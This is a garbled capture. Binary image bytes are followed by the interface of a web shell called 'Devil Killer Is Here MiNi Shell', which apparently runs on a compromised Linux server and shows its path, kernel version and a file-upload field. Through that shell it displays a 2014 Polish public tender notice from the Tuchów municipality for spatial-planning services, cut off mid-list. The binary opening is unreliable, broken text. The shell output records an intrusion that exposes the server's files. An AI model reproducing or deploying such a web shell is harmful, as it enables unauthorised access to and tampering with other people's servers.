JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140513/159968-N-2014.html

<p class="kh_header"><b>Tuchów: Wykonanie projektu zmiany miejscowych planów zagospodarowania przestrzennego Gminy Tuchów, obejmującej  miejscowości: Buchcice, Dąbrówka Tuchowska, Karwodrza, Lubaszowa, Łowczów, Meszna Opacka, Siedliska, Trzemesna, Zabłędza.</b><br>
<b>Numer ogłoszenia: 159968 - 2014; data zamieszczenia: 13.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuchów , ul. Rynek 1, 33-170 Tuchów, woj. małopolskie, tel. 0146525218 w. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tuchow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektu zmiany miejscowych planów zagospodarowania przestrzennego Gminy Tuchów, obejmującej  miejscowości: Buchcice, Dąbrówka Tuchowska, Karwodrza, Lubaszowa, Łowczów, Meszna Opacka, Siedliska, Trzemesna, Zabłędza..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie projektu zmiany miejscowych planów zagospodarowania przestrzennego Gminy Tuchów, obejmującej miejscowości: Buchcice, Dąbrówka Tuchowska, Karwodrza, Lubaszowa, Łowczów, Meszna Opacka, Siedliska, Trzemesna, Zabłędza.

Zadanie obejmuje wykonanie w szczególności niżej wymienionych dokumentów oraz dokonanie następujących czynności :
- część tekstowa planu /treść uchwały/, w postaci ujednoliconego tekstu ustaleń planu dla wszystkich miejscowości łącznie  -  zredagowana w pliku o formacie. xml, takim który może być akceptowany i bezbłędnie zaimportowany do edytora xml  Legislator ABC PRO /używanego do redagowania aktów prawnych przez Urząd Miejski w Tuchowie/, 
- część graficzna planu - 9 załączników graficznych do uchwały w skali 1 : 2.000 - ujednolicone rysunki planu oddzielne dla każdej z 9 miejscowości, 
- opracowanie propozycji rozpatrzenia wniosków złożonych do planu,  
- opracowanie wstępnego projektu planu,
- sporządzenie prognozy oddziaływania na środowisko,
- sporządzenie prognozy skutków finansowych uchwalenia planu,
- sporządzenie opracowania ekofizjograficznego, 
- wszystkie wymagane ustawowo opinie i uzgodnienia do projektu /w tym zgoda na zmianę przeznaczenia gruntów rolnych i leśnych na cele nierolnicze i nieleśne, jeżeli wymagają tego przepisy odrębne/, 
- wprowadzenie zmian do projektu planu, wynikających z dokonanych uzgodnień i uzyskanych opinii,
- udział w dyskusji publicznej nad przyjętymi w projekcie planu rozwiązaniami, w trakcie jego wyłożenia do publicznego wglądu,
- rozpatrzenie uwag złożonych do projektu planu i wprowadzenie wynikających z nich zmian w projekcie planu, 
- wszystkie wymagane ustawowo załączniki tekstowe do uchwały,
- skompletowanie dokumentacji prac planistycznych, potrzebnej do przekazania wojewodzie w celu oceny zgodności z przepisami prawnymi, po uchwaleniu zmiany planu. 
Dodatkowe informacje dotyczące przedmiotu niniejszego zamówienia:
Przedmiotem zamówienia jest opracowanie projektu zmiany obowiązujących aktualnie miejscowych planów zagospodarowania przestrzennego Gminy Tuchów, w zakresie określonym w następujących aktach prawnych: 
a/ Uchwała Rady Miejskiej w Tuchowie Nr XLIII 318 2010 z dnia 31 marca 2010 r. w sprawie przystąpienia do zmiany miejscowego planu zagospodarowania przestrzennego Gminy Tuchów, dla wsi: Buchcice, Burzyn, Jodłówka Tuchowska, Karwodrza, Lubaszowa, Łowczów, Meszna Opacka, Piotrkowice, Trzemesna, Zabłędza, /uchwalonego Uchwałą Nr XIII 102 2007 Rady Miejskiej w Tuchowie z dnia 24 października 2007 r., ogłoszoną w Dzienniku Urzędowym Województwa Małopolskiego Nr 133 z dnia 27 lutego 2008 r. poz. 890, obowiązującą od dnia 29 marca 2008 r./,  
b/  Uchwała Rady Miejskiej w Tuchowie Nr XLIII 319 2010 z dnia 31 marca 2010 r. w sprawie przystąpienia do zmiany miejscowego planu zagospodarowania przestrzennego Gminy Tuchów, dla wsi: Dąbrówka Tuchowska, Siedliska, /uchwalonego Uchwałą Nr XVII 143 2008 Rady Miejskiej w Tuchowie z dnia 27 lutego 2008 r., ogłoszoną w Dzienniku Urzędowym Województwa Małopolskiego Nr 299 z dnia 12 maja 2008 r. poz. 1998, obowiązującą od dnia 12 czerwca 2008 r./,
c/  Uchwała Rady Miejskiej w Tuchowie Nr XLIV 336 2014 z dnia 26 lutego 2014 r. w sprawie przystąpienia do sporządzenia zmiany miejscowego planu ogólnego zagospodarowania przestrzennego Gminy Tuchów, /uchwalonego Uchwałą Nr XVIII 213 00 Rady Miejskiej w Tuchowie z dnia 6 września 2000 r./ -  w zakresie obszarów objętych przedmiotowym planem, położonych w miejscowościach: Buchcice, Dąbrówka Tuchowska, Karwodrza, Lubaszowa, Łowczów, Meszna Opacka, Siedliska, Zabłędza, 
d/  Zarządzenie Burmistrza Tuchowa Nr 54 2014 z dnia 4 marca 2014 r. w sprawie sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego Gminy Tuchów, dla wsi: Buchcice, Karwodrza, Lubaszowa, Łowczów, Meszna Opacka, Trzemesna, Zabłędza,    
e/  Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Miasta i Gminy Tuchów, uchwalone Uchwałą Nr XXI 243 2000 Rady Miejskiej w Tuchowie z dnia 29 listopada 2000 r. oraz zmienione Uchwałą Nr V 42 2007 Rady Miejskiej w Tuchowie z dnia 28 lutego 2007 r. 
f/ wraz z kompletną dokumentacją prac planistycznych, niezbędną dla uchwalenia zmiany planu miejscowego i do przekazania wojewodzie w celu oceny zgodności z przepisami prawnymi, sporządzoną zgodnie z obowiązującym w zakresie merytorycznym i formalnym stanem prawnym, a szczególnie z Ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym /tekst jedn. Dz.U. z 2012 r. poz. 647, z późn.zm./, oraz Rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego /Dz.U. z 2003 r. Nr 164, poz.1587/. 
Kopie w/w uchwał i zarządzenia w sprawie zmiany MPZP oraz mapa topograficzna miasta i gminy Tuchów w skali 1 : 50.000 wskazująca granice Gminy Tuchów, znajdują się w załącznikach nr  8 - 9  do SIWZ.
Opracowaniem planistycznym należy objąć cały obszar wymienionych w nazwie zadania 9 miejscowości wchodzących w skład Gminy Tuchów w ich granicach administracyjnych, o łącznej powierzchni ok. 5.000  ha. 
W opracowaniu należy uwzględnić wnioski złożone przez zainteresowanych mieszkańców.
Skala rysunków planu stanowiących integralną część projektu zmiany planu - to skala 1 : 2.000 /jest to skala, w jakiej są wykonane mapy zasadnicze z terenu Gminy Tuchów/.  
Materiały mapowe - kopie map zasadniczych w skali 1 : 2.000 i map ewidencyjnych w skali 1 : 2.000 na nośniku elektronicznym lub papierowym dostarcza Zamawiający, /rodzaj nośnika zależny od potrzeb i możliwości technicznych/, ale po stronie Wykonawcy leży w razie potrzeby pozyskanie map topograficznych lub innych z danymi wysokościowymi terenu i naniesienie tych danych na rysunek planu miejscowego.
Do wykorzystania na potrzeby wykonania zamówienia Zamawiający udostępni Wykonawcy obowiązujące aktualnie miejscowe plany zagospodarowania przestrzennego Gminy Tuchów, obowiązujące Studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Tuchów, oraz inne przydatne dokumenty będące w posiadaniu urzędu.  MPZP w wersji elektronicznej są dostępne w Biuletynie Informacji Publicznej Urzędu Miejskiego w Tuchowie na stronie internetowej www.tuchow.pl.  
W obszarze objętym opracowaniem występują strefy ochrony konserwatorskiej, obiekty wpisane do rejestru zabytków, do ewidencji zabytków i stanowiska archeologiczne, dlatego należy uwzględnić wynikające z tego faktu wszystkie nakazy, zakazy i inne ustalenia szczegółowe.
W opracowaniu należy uwzględnić fakt położenia Gminy Tuchów na terenie Obszaru Chronionego Krajobrazu Pogórza Ciężkowickiego oraz Parku Krajobrazowego Pasma Brzanki i wynikające z tego wszystkie nakazy, zakazy i inne ustalenia szczegółowe.
Opracowany projekt zmiany miejscowego planu zagospodarowania przestrzennego winien być zaopiniowany i uzgodniony ze wszystkimi instytucjami, organami administracji rządowej i samorządowej, wymienionymi w art. 17 ustawy z dnia 27 marca  2003 r. o planowaniu i zagospodarowaniu przestrzennym.
Za wykonanie przedmiotu zamówienia uważa się dostarczenie Zamawiającemu po uchwaleniu zmiany planu przez Radę Miejską w Tuchowie, kompletnej dokumentacji planistycznej potrzebnej do przekazania wojewodzie w celu oceny zgodności z przepisami prawnymi.
Przedmiot zamówienia w części graficznej /rysunki planu/ zostanie wykonany przez Wykonawcę w następujących ilościach: 
- 4 egzemplarze w wersji papierowej w skali 1 : 2.000, 
- 1 egzemplarz w wersji elektronicznej - w formacie umożliwiającym publikację w Dzienniku Urzędowym Województwa Małopolskiego, z zachowaniem oryginalnej skali map i z podziałem ich na sekcje o formatach A-4 /jeden plik wielostronicowy formatu.pdf oraz pliki formatu.jpg - dla obszaru każdej miejscowości oddzielnie/,  
-  1 egzemplarz w wersji elektronicznej - umożliwiającej późniejsze sporządzanie wyrysów z planu miejscowego.  
Warunki techniczne dotyczące wersji elektronicznej:
-  Plan powinien być przygotowany jako warstwy w plikach wektorowych w formacie ESRI shapefile, w układzie współrzędnych 2000, strefa 7.
-  warstwa - typ Poligony - MPZP
Baza danych powinna składać się prócz kolumny geometrii minimum z czterech kolumn:
Obręb - nazwa obrębu
Plan - symbol konturu /np. 8.ZL/
XCOORD - współrzędna X opisu
YCOORD - współrzędna Y opisu
-  warstwa - typ Linie - MPZP
Baza danych powinna składać się prócz kolumny geometrii minimum z dwóch kolumn:
Obręb - nazwa obrębu
Linia - rodzaj linii /nazwa linii/
-  warstwa - typ punkty - MPZP
Baza danych powinna składać się prócz kolumny geometrii minimum z dwóch kolumn:
Obręb - nazwa obrębu
punkt - nazwa punktu /symbolu/
- oprócz tego należy również dostarczyć opracowane symbole w postaci plików wektorowych SVG.
Przedmiot zamówienia należy wykonać zgodnie z warunkami określonymi w pozostałych postanowieniach SIWZ, w szczególności w projekcie umowy, stanowiącym załącznik nr  7 do SIWZ. 

Wykonawca bierze na siebie pełną odpowiedzialność za należyte wykonanie prac, oraz zastosowanie właściwych metod organizacyjno-technicznych.

Zasady odbioru prac: 
Przyjęcia poszczególnych etapów prac, o których mowa w projekcie umowy - załącznik Nr 7 do SIWZ, potwierdzane będą protokołami dostarczenia dokumentacji podpisanymi przez Zamawiającego i Wykonawcę w siedzibie Zamawiającego. 
Po przyjęciu poszczególnych etapów prac Zamawiający dokona sprawdzenia dostarczonej dokumentacji przez Wykonawcę. Sprawdzenie dostarczonej dokumentacji nastąpi w ciągu 21 dni od dnia podpisania protokołu. W przypadku stwierdzenia wad, błędów, niekompletnego opracowania lub innych nieprawidłowości, Wykonawca usunie je zgodnie z zastrzeżeniami zgłoszonymi przez Zamawiającego w protokole wad i błędów, w terminie wskazanym przez Zamawiającego w protokole, na własny koszt. Potwierdzeniem wykonania zleconych czynności będzie podpisany bez zastrzeżeń protokół odbioru prac. Protokół ten stanowić będzie podstawę do wystawienia przez Wykonawcę  faktury VAT.

Wykonawca będzie ponosił odpowiedzialność wobec Zamawiającego lub osób trzecich za ewentualne szkody powstałe w wyniku niewykonania lub nienależytego wykonania usług stanowiących przedmiot niniejszego zamówienia.
KOD CPV :  71410000-5  -  Usługi planowania przestrzennego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  nie  wymaga  wniesienia  wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedmiotowy warunek zostanie uznany za spełniony, jeżeli wykonawca  udokumentuje uprawnienia do występowania w obrocie prawnym. Działalność  prowadzona  na  potrzeby  wykonania  przedmiotu  zamówienia  nie  wymaga  posiadania  specjalnych  uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe wykonanie zamówienia. 
Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jego działalności jest krótszy - to w tym okresie - zrealizował z należytą starannością co najmniej 1 miejscowy plan zagospodarowania przestrzennego. Przez zrealizowany plan Zamawiający rozumie taką uchwałę w sprawie uchwalenia planu, która została opublikowana w Dzienniku Urzędowym województwa i w stosunku do której nie zostało wydane rozstrzygnięcie nadzorcze wojewody. 
W przypadku podmiotów działających wspólnie warunek posiadania wiedzy i doświadczenia podlega sumowaniu - wg załącznika nr  2 do SIWZ.
Sprawdzenie w/w warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu wykonanych usług  -  wg załącznika nr  3 do SIWZ,  oraz przedłożonych przez Wykonawcę poświadczeń / innych dokumentów wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i nie żąda dokumentów wykazujących spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia, to znaczy co najmniej jedną osobą legitymującą się aktualnym wpisem na listę członków właściwej Okręgowej Izby Urbanistów, o której mowa w ustawie z dnia 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów  (tekst jedn. Dz.U. z 2013 r. poz. 932, z późn. zm.).  
Sprawdzenie w/w warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu osób, wg zasady spełnia/nie spełnia.
Ocena tego warunku będzie dokonana w oparciu o złożony przez Wykonawcę wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, zgodnego z brzmieniem Załącznika Nr   4  do  SIWZ. 
Wykonawca  może  polegać  na  osobach  zdolnych  do  wykonania  zamówienia  innych  podmiotów, niezależnie od  charakteru  prawnego  łączących  go  z  nimi  stosunków, udowadniając  iż  będzie  dysponował  osobami  zdolnymi do  wykonania  zamówienia, w  szczególności  przedstawiając  pisemne  zobowiązanie  tych  podmiotów  do  oddania do  dyspozycji  niezbędnych  osób  na  okres  korzystania  z  nich  przy  wykonaniu  zamówienia.
Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  wymaga, aby  wykonawca  był  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej  na  kwotę  nie mniejszą niż  100.000  PLN oraz aby oświadczył, że  znajduje  się  w  dobrej  sytuacji  finansowej  i  ekonomicznej. 

Ocena tego warunku zostanie dokonana  na  podstawie :
- załączonej do oferty opłaconej polisy, a w przypadku  jej  braku  innego  dokumentu  potwierdzającego, że  wykonawca  jest  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  związanej  z  przedmiotem  zamówienia
- oświadczenia, że wykonawca znajduje się w dobrej kondycji finansowej i ekonomicznej, złożonego w dokumencie  o nazwie oświadczenie - załącznik nr  2  do  SIWZ.  
Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek.
Jeżeli  wykonawca  wykazując  spełnienie  warunków  w  postępowaniu  polega  na  zasobach  innych  podmiotów  na  zasadach  określonych  w  art. 26  ust. 2B  uPzp, a  podmioty  te  będą  brały  udział  w  realizacji  części  zamówienia, wykonawca  przedstawi  w  odniesieniu  do  tych  podmiotów  wszystkie  dokumenty  wymienione  powyżej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1). Projekt  umowy stanowi Załącznik Nr  7  do Specyfikacji  Istotnych  Warunków Zamówienia. W jej treści, która nie podlega negocjacjom, podano wszelkie istotne dla zamawiającego warunki realizacji zamówienia. 
2). Zamawiający przewiduje możliwość istotnej zmiany zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru oferty, w zakresie terminów jej wykonania w następujących okolicznościach:
1.wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy - w zakresie dostosowania postanowień umowy do zmiany przepisów prawa;
2.zmiany nazwy lub formy prawnej stron - w zakresie dostosowania umowy do tych zmian;
